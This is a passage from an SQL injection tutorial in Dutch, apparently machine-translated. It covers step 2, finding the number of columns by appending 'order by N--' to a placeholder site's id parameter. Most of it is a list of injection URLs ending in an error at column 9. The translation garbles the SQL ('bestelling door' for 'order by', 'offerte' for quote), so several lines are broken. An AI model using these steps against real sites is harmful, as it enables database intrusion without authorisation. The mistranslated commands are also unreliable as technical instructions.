Stap 2: Het aantal kolommen uitzoeken
We gaan de opdracht de orde doorgenoemd. Dit commando vertelt database Hoe te bestellen van het resultaat.
U kunt deze opdracht gebruiken, verwijderen van de offerte (') die u eerder hebt getypt en typ in de opdracht volgorde door 1--
De website zal zijn: http://Vulnerable.com/goodies.php?id=10 order by, 1--
Nu, houden verhoging van het aantal totdat we een fout krijgen
Tip: De "--" is van een dubbele koppelteken / minteken
[Hier is hoe het werkt]
http://vulnerable.com/goodies.php?id=10 bestelling door 1--< = krijgen We geen fout
http://vulnerable.com/goodies.php?id=10 bestelling door 2--< = krijgen We geen fout
http://vulnerable.com/goodies.php?id=10 bestelling door 3--< = krijgen We geen fout
http://vulnerable.com/goodies.php?id=10 bestelling door 4--< = krijgen We geen fout
http://vulnerable.com/goodies.php?id=10 bestelling door 5--< = krijgen We geen fout
http://vulnerable.com/goodies.php?id=10 bestelling door 6--< = krijgen We geen fout
http://vulnerable.com/goodies.php?id=10 bestelling door 7--< = krijgen We geen fout
http://vulnerable.com/goodies.php?id=10 bestelling door 8--< = krijgen We geen fout
http://vulnerable.com/goodies.php?id=10 bestelling door 9--< = Bingo! We hebben de fout "Onbekende kolom '9' in 'order-component'"
Hadden we een fout op de negende proberen. Dus er 8 kolommen zijn.